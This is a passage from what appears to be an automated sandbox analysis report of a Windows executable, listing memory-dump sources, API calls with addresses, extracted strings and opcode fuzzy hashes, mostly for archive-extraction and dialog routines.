                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 857d57a6dbf571ec83da500d40793bf902b1fc9fcc73a1f91632b1728cb6b97a
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 857d57a6dbf571ec83da500d40793bf902b1fc9fcc73a1f91632b1728cb6b97a
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5899f566588cce89a738ae4f49e18f82b1e96a78334e80fc80428ee0722cd8f6
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 5899f566588cce89a738ae4f49e18f82b1e96a78334e80fc80428ee0722cd8f6
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1ee75345a5b9808e8b425000260731acbefd63f80b8d8b1f116b6b111025ab80
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 1ee75345a5b9808e8b425000260731acbefd63f80b8d8b1f116b6b111025ab80
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a0e25668980cc1b383039bd99178860fc0364de9c160d668c34729116ffef46f
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: a0e25668980cc1b383039bd99178860fc0364de9c160d668c34729116ffef46f
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0f16c1dfc6e637748ad993b4420afbe3061d53ad83d1ec147947d43335dd9d3f
                • Instruction ID: 4f8efbf9c694a92701a5ba5ea05b578fc592ee1de8beb47a6abfbcfcd6015925
                • Opcode Fuzzy Hash: 0f16c1dfc6e637748ad993b4420afbe3061d53ad83d1ec147947d43335dd9d3f
                • Instruction Fuzzy Hash: F8A0129296C0427C300875036C02D3E020CC2C0B12330451FF0068008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 62b135882e67d4c10c7638bc8b63fb1b545bfe7d0b579e21fe8194410af64f8b
                • Instruction ID: 534a1ef8a90ce6d9a7ca70d5dc25f7f13fda39e0d28d00e1bc318ffc9e68639e
                • Opcode Fuzzy Hash: 62b135882e67d4c10c7638bc8b63fb1b545bfe7d0b579e21fe8194410af64f8b
                • Instruction Fuzzy Hash: B3A01292A6C0413C3008B503AC02D3E020CD2C0B13330411FF0069008454480C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 496ed705a31a92c48c2dbc86bcc755eaba3ee70a4c8394e06e63f9821fa6767e
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 496ed705a31a92c48c2dbc86bcc755eaba3ee70a4c8394e06e63f9821fa6767e
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 53db0e8075fa8f951cc70bfeee5888142197d1cb365ed3b7ad2bed2ba322efee
                • Instruction ID: 8cc22a950654db6fe7a61b433ed81b059fba2a0660b34d9938567f1b677f7f49
                • Opcode Fuzzy Hash: 53db0e8075fa8f951cc70bfeee5888142197d1cb365ed3b7ad2bed2ba322efee
                • Instruction Fuzzy Hash: 15A01295D6C1427C300C61036C02C3E021CC2C0B92330480FB006900C055841C054039
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e29fcdc737941dc90b06a856a548f3f08faf30c3d28d32aa25c975e6034a0b33
                • Instruction ID: 8cc22a950654db6fe7a61b433ed81b059fba2a0660b34d9938567f1b677f7f49
                • Opcode Fuzzy Hash: e29fcdc737941dc90b06a856a548f3f08faf30c3d28d32aa25c975e6034a0b33
                • Instruction Fuzzy Hash: 15A01295D6C1427C300C61036C02C3E021CC2C0B92330480FB006900C055841C054039
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fc44a6091f1961fa8ce1a01db84987c3d07252fe4382d63b742f1e736d116f04
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: fc44a6091f1961fa8ce1a01db84987c3d07252fe4382d63b742f1e736d116f04
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7865a5c0e5c51fd17ec3a129bfb532d9ec45d0dd09004ce5c2884cc594bb0fb3
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 7865a5c0e5c51fd17ec3a129bfb532d9ec45d0dd09004ce5c2884cc594bb0fb3
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 96ddd0d4f9076d06dfc1735eb25c35b8c2428ebc7eda75f6396a2645ee349375
                • Instruction ID: b49391caf9b9b270dfd0f39f1fb7d37e0121191021cbe2dc1927cdf8cf0fe151
                • Opcode Fuzzy Hash: 96ddd0d4f9076d06dfc1735eb25c35b8c2428ebc7eda75f6396a2645ee349375
                • Instruction Fuzzy Hash: D2A01295A7C0427C300851036C07D3A031CD2C0B12330440FB406900C06A441C05003A
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,004EA587,C:\Users\user\Desktop,00000000,0051946A,00000006), ref: 004EA326
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 8b8601366f71557eef7abc591181de10b6bc3f149f351732e51a61528e0577ac
                • Instruction ID: 5fa8e120e4ac60fe1dfd5a70adbb2ff814dc9f2e5a731720e9e268f96e064b2e
                • Opcode Fuzzy Hash: 8b8601366f71557eef7abc591181de10b6bc3f149f351732e51a61528e0577ac
                • Instruction Fuzzy Hash: ECA0123019400656CB100B30CC09C1976545770702F0086207002C00A0CB308818F500
                APIs
                • CloseHandle.KERNELBASE(000000FF,?,?,004D968F,?,?,?,?,00501FA1,000000FF), ref: 004D96EB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: e99c080cb08c16cdfd6db9c50d9e64d4d21d0ce20c4a59138557a7e750e88d95
                • Instruction ID: e591439a62cf4d0d589a3a7a5f0d4d3502c116ba3c2ffae6a0d3d739ea90fedd
                • Opcode Fuzzy Hash: e99c080cb08c16cdfd6db9c50d9e64d4d21d0ce20c4a59138557a7e750e88d95
                • Instruction Fuzzy Hash: 5DF05E30556B048FDB308E24D5A9793B7E8AB12725F049B1F90EB937E0D769A88D9B04
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004EB971
                • EndDialog.USER32(?,00000006), ref: 004EB984
                • GetDlgItem.USER32(?,0000006C), ref: 004EB9A0
                • SetFocus.USER32(00000000), ref: 004EB9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 004EB9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004EBA18
                • FindFirstFileW.KERNEL32(?,?), ref: 004EBA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004EBA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004EBA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004EBA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004EBA94
                • _swprintf.LIBCMT ref: 004EBAC4
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004EBAD7
                • FindClose.KERNEL32(00000000), ref: 004EBADE
                • _swprintf.LIBCMT ref: 004EBB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 004EBB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004EBB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004EBB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004EBB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004EBBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004EBBC9
                • _swprintf.LIBCMT ref: 004EBBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004EBC08
                • _swprintf.LIBCMT ref: 004EBC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 004EBC6F
                  • Part of subcall function 004EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004EA662
                  • Part of subcall function 004EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0050E600,?,?), ref: 004EA6B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: d136f8807852e493c751eb8a1f9fcac2364c0e2d583d48c429e49133e5d3cfc8
                • Instruction ID: c2834d815487b26675e8ab57cf3cbbb265be839120feffea3daf752e238e1eb1
                • Opcode Fuzzy Hash: d136f8807852e493c751eb8a1f9fcac2364c0e2d583d48c429e49133e5d3cfc8
                • Instruction Fuzzy Hash: 1B91D4B2208388BBD7219BA1CD49FFF77ACEB49705F00081AB749D2191D774A609DB62
                APIs
                • __EH_prolog.LIBCMT ref: 004D7191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004D72F1
                • CloseHandle.KERNEL32(00000000), ref: 004D7301
                  • Part of subcall function 004D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004D7C04
                  • Part of subcall function 004D7BF5: GetLastError.KERNEL32 ref: 004D7C4A
                  • Part of subcall function 004D7BF5: CloseHandle.KERNEL32(?), ref: 004D7C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004D730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004D741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004D7446
                • CloseHandle.KERNEL32(?), ref: 004D7457
                • GetLastError.KERNEL32 ref: 004D7467
                • RemoveDirectoryW.KERNEL32(?), ref: 004D74B3
                • DeleteFileW.KERNEL32(?), ref: 004D74DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: cd30d83ff725659464e28ded37686b623d55ff9ef34aba8bc0ad4c6db1b7089a
                • Instruction ID: 63607c382c969fd4e4e2e87da7b3bd58ff8f2bcca869f61b49a940c754322ebb
                • Opcode Fuzzy Hash: cd30d83ff725659464e28ded37686b623d55ff9ef34aba8bc0ad4c6db1b7089a
                • Instruction Fuzzy Hash: 88B1D171904215AADF21DB60DC55BEFB7B8AF04304F0441AFF949E7342E738AA49CB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: bf53e31e79f052d36b7ff0e5ba3015d0634ea78c2ae7c193b22a39cc0fbc30cd
                • Instruction ID: b2329bb8c54ed9e0c7ecff27d6b5869408e3157000efd55bd20bc17383aa0f20
                • Opcode Fuzzy Hash: bf53e31e79f052d36b7ff0e5ba3015d0634ea78c2ae7c193b22a39cc0fbc30cd
                • Instruction Fuzzy Hash: 6D32D4716102849FDF14DF34C8A5AEA37A5AF15304F04447FFD8A8B382DB78AA49CB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 008346eae8b57b7078b2a5d522406f96acf84df3a3e5180badd1c8b02eaec6f8
                • Instruction ID: aac2432fae136a03e84a385b3b0bb9fa79e8c5e84ea924de6b18dcdb78df1575
                • Opcode Fuzzy Hash: 008346eae8b57b7078b2a5d522406f96acf84df3a3e5180badd1c8b02eaec6f8
                • Instruction Fuzzy Hash: CEC23872E0862C8FDB25CE299D407EAB7B6EB44305F1541EBD90DE7240E778AE818F45
                APIs
                • __EH_prolog.LIBCMT ref: 004D27F1
                • _strlen.LIBCMT ref: 004D2D7F
                  • Part of subcall function 004E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004DB652,00000000,?,?,?,00010418), ref: 004E1396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D2EE0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 8dcd7948b886c94c054c4819873f1b1cd37f267cf23aafcc7cd580eefc4e22ae
                • Instruction ID: 2d783b13922b31b675ed3f9bd95d3f572368776aa8e17e2ea47df6d2b53a75a7
                • Opcode Fuzzy Hash: 8dcd7948b886c94c054c4819873f1b1cd37f267cf23aafcc7cd580eefc4e22ae
                • Instruction Fuzzy Hash: 5F6214716002448FDF19DF34C9A56EA3BE1AF64304F04457FEC9A8B382D7B8A945CB59
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004F8767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004F8771
                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004F877E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: d1e0332fe3e5b8e61ad21eb39ff7acb992aeb4aeb7b9b0b1fdc4c8bbfde069bb
                • Instruction ID: 0db93674f4cdac912ea7bc9cf263b5d37a873cae8bd6faa97f744dad1eb3d75a
                • Opcode Fuzzy Hash: d1e0332fe3e5b8e61ad21eb39ff7acb992aeb4aeb7b9b0b1fdc4c8bbfde069bb
                • Instruction Fuzzy Hash: AB31D47590122C9BCB21DF25DC89B9DBBB8BF58310F5041EAE90CA7251EB349F858F48
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction ID: 793aa64f6fee6ed076cef18219c605e48792ae0164d26f1b502fcb01109360c4
                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction Fuzzy Hash: E0021C71E0021D9BDF14CFA9C9806AEFBF1EF88314F25416AE919E7384D735A941CB94
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004EA662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0050E600,?,?), ref: 004EA6B1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: 8cd1ee28647b75a82a94049cac03a2079497d854576e31dadcd388c3c588f399
                • Instruction ID: 88558ea6efc2482ad79197d3d1697c7fc906f90030174fcbaf20b59d242f5e81
